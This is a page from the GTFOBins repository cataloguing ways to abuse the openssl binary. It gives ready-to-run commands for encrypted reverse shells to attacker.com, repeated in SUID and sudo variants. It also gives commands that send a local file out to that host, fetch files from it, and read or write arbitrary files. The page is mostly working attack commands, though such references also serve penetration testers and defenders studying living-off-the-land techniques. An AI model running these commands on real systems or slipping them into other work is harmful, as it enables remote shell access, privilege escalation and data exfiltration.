GTFOBins.github.io/_gtfobins/openssl.md
2019-07-29 16:41:49 +02:00

3.0 KiB

functions
reverse-shell file-upload file-download file-write file-read suid sudo
description code
To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted. RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
description code
To collect the file run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save Send a local file via TCP. Transmission will be encrypted. RHOST=attacker.com RPORT=12345 LFILE=file_to_send openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE"
description code
To send the file run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send Fetch a file from a TCP port, transmission will be encrypted. RHOST=attacker.com RPORT=12345 LFILE=file_to_save openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
code
LFILE=file_to_write echo DATA | openssl enc -out "$LFILE"
code
LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF openssl enc -in "$TF" -out "$LFILE"
code
LFILE=file_to_read openssl enc -in "$LFILE"
description code
To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted. RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
code
LFILE=file_to_write echo DATA | openssl enc -out "$LFILE"
description code
To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted. RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s